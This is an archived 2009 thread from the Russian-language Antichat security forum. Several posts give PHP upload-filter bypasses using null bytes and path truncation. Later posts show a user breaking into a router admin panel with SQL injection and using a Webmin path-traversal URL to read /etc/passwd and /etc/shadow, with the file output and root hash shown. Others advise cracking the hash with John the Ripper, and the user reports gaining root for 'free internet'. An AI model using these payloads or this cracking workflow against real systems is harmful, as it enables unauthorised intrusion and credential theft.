ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.10.2009, 17:55
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме: 4761503
Репутация:
229
|
|
Null байт не действует при аплоаде в систему виндувс? (php)
Последний раз редактировалось wolmer; 31.10.2009 в 18:04..
|
|
|

31.10.2009, 20:24
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
On Windows OS move_uploaded_file function will convert "foo.php"
followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
back to "foo.php"
|
|
|

31.10.2009, 22:02
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
показывает это (урывок): root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
И такую:
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
Показывает такое (урывок):
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
bin:*:14346:0:99999:7:::
daemon:*:14346:0:99999:7:::
adm:*:14346:0:99999:7:::
lp:*:14346:0:99999:7:::
sync:*:14346:0:99999:7:::
shutdown:*:14346:0:99999:7:::
halt:*:14346:0:99999:7:::
mail:*:14346:0:99999:7:::
news:*:14346:0:99999:7:::
uucp:*:14346:0:99999:7:::
Можно логин-пароль найти в этих данных?
|
|
|

31.10.2009, 22:08
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Можно логин-пароль найти в этих данных?
->
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
Интересный, кстати говоря, случай.
Чтобы расшифровать пароля рута используй JohnTheRipper
--
Баг оказался древним
http://www.fduran.com/blog/webmin-vulnerability-exposing-your-password-or-any-file/
|
|
|

31.10.2009, 22:22
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
JohnTheRipper для *nix. Для винды тоже есть, только как им пользоваться ... просцу. Подскажите, что это за хеш? Какой алг его расшифровки. И где логин? ( Если туплю, сорри. Я не хакер, я просто бесплатного интернета хочу. Потому прошу помощи)
Нашел руководство по JohnTheRipper. Теперь проблема в другом.
JTR нужно кормить файлом с содержимым
root:6xp8Tw7//32x2:0:0:root:/:/bin/bash
А у меня содержимое в shadow
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
А в passwd:
root:x:0:0:root:/root:/bin/bash
Западло. Что делать?
Последний раз редактировалось DrakonSerg; 31.10.2009 в 22:35..
|
|
|

31.10.2009, 22:54
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Всем спасибо. Может кому пригодится: получил root скриптом Админ продолжает сосать)))
|
|
|

31.10.2009, 22:59
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 18
Провел на форуме: 27465
Репутация:
6
|
|
Хеш: FreeBSD MD5
Логин: Root
На счёт алгоритма в google поищи.
------------
Просто скопируй root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7::: в файл shadow
и переберай джоником ./john shadow
|
|
|

31.10.2009, 23:00
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 18
Провел на форуме: 27465
Репутация:
6
|
|
Сорри, не пропустил последний пост  )
|
|
|

31.10.2009, 23:02
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 18
Провел на форуме: 27465
Репутация:
6
|
|
Подскажите пожалуста, возможно ли проснифать трафик хоста например 192.168.2.1 c машины с адресом 192.168.1.1 разделлённые маршрутизатороми, если хост 192.168.1.1 физически соединён только с маршрутизатором, и в ARP таблици только адрес этого маррутизатора?
|
|
|

31.10.2009, 23:17
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Не, ну шутки шутками. Объясните мне пожалуйста, почему меня пустило в админку введением одного логина: root. Поле пароля пустое. Это недоработка webmina? Или я чтото сделал своими слабенькими манипуляциями?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|